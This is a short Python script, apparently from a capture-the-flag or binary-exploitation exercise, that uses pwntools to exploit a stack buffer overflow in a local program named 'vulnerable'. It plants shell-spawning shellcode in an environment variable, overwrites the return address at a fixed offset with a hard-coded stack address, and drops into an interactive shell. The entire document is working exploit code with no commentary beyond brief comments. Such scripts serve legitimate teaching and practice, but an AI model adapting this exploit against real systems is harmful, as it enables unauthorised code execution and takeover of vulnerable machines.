#!/usr/bin/env python from pwn import * context.binary = "./vulnerable" # Generate vars: a shellcode, return address offset, target address. shellcode = asm(shellcraft.sh()) ret_offset = 16 target = 0x7fffffffeba4 # Generate process, with SHELLCODE as an env var. io = process('./vulnerable', env= { 'SHELLCODE' : shellcode }) # Craft payload. payload = b"A" * ret_offset payload += pack(target) # Send payload. io.sendline(payload) io.interactive()